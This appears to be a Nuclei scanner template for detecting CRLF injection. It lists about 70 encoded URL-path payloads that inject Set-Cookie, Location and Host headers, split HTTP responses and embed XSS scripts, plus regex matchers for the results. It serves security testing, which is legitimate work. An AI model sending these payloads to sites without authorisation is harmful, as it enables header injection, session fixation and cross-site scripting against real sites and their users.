id: CRLF-Extended
info:
  name: CRLF Injection Detection
  author: coffin
  severity: High
  description: CRLF extended
  reference:
    - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
  tags: crlf, crlf-ext , generic
  metadata:
    max-request: 5
http:
  - method: GET
    path:
      - "{{BaseURL}}/%%0a0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%%E5%98%8A%E5%98%8DSet-Cookie:%20coffin=hi"
      - "{{BaseURL}}/%0d%0aLocation:%20http://google.com"
      - "{{BaseURL}}/http://google.com/%2F..%0D%0AHeader-coffin:hi"
      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23"
      - "{{BaseURL}}/%0d%0a%0d%0a<script>alert('XSS')</script>;"
      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e"
      - "{{BaseURL}}/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E"
      - "{{BaseURL}}/%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20coffin=hi%0d%0a%0d%0a"
      - "{{BaseURL}}/%0d%0ahost:%20www.google.com"
      - "{{BaseURL}}/%0d%0ahost:%20www.google.com%0d%0a"
      - "{{BaseURL}}/%0d%0aLocation:%20http://google.com"
      - "{{BaseURL}}/%0d%0aLocation:www.google.com%0d%0a"
      - "{{BaseURL}}/%0d%0aSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E"
      - "{{BaseURL}}/%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%0dSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%0d0aSet-Cookie%20coffin=hi"
      - "{{BaseURL}}/%0aSet-Cookie%20coffin=hi"
      - "{{BaseURL}}/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>"
      - "{{BaseURL}}/%23%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%23%0D%0ALocation:www.google.com;"
      - "{{BaseURL}}/%23%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%23%0dSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%250aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%25250aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%25%30%61Set-Cookie:coffin=hi"
      - "{{BaseURL}}/%25%30aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%2e%2e%2f%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%2F..%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%2f%2e%2e%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F../%2F..%2F..%2F..%2F../tr"
      - "{{BaseURL}}/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E"
      - "{{BaseURL}}/%3f%0d%0aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%3f%0dSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%5Cr%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5Cnhost:%20www.google.com%5Cr%5Cn"
      - "{{BaseURL}}/%5cr%5cnLocation:www.google.com"
      - "{{BaseURL}}/%5Cr%5CnSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5Cr%5CtSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%5CrSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%E5%98%8A%E5%98%8Dheader:header"
      - "{{BaseURL}}/%E5%98%8A%E5%98%8DLocation:www.google.com"
      - "{{BaseURL}}/%E5%98%8A%E5%98%8DSet-Cookie:coffin=hi"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ALocation:www.google.com"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffinxp=coffinxp"
      - "{{BaseURL}}/\r%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/\r\n%20Set-Cookie:coffin=hi;"
      - "{{BaseURL}}/\r\nhost:%20www.google.com\r\n"
      - "{{BaseURL}}/\r\nHost: {{Hostname}}\r\nCookie: coffin=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: coffin=hi\r\n\r\n"
      - "{{BaseURL}}/\r\nLocation:www.google.com"
      - "{{BaseURL}}/\r\nSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/\r\n\tSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/\rSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/\r\tSet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%u000ASet-Cookie:coffin=hi;"
      - "{{BaseURL}}/%u000aSet-Cookie:coffin=hi"
      - "{{BaseURL}}/www.google.com/%2E%2E%2F%0D%0Acoffin-x:coffin-x"
      - "{{BaseURL}}/www.google.com/%2F..%0D%0Acoffin-x:coffin-x"
      - "{{BaseURL}}//www.google.com/%2F%2E%2E%0D%0Acoffin-x:coffin-x"
    stop-at-first-match: false
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)www\.google\.com\/?(\/|[^.].*)?$|(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(coffin=hi)(?:\s*?)(?:$|;)))'
          - '(?m)^(?:(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)www\.google\.com\/?(\/|[^.].*)?$|(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(coffin=hi)(?:\s*?)(?:$|;)|coffin-x))'
        part: header
      - type: status
        status:
          - 200
          - 201
          - 202
          - 204
          - 205
          - 206
          - 207
          - 301
          - 302
          - 307
          - 308
        condition: or
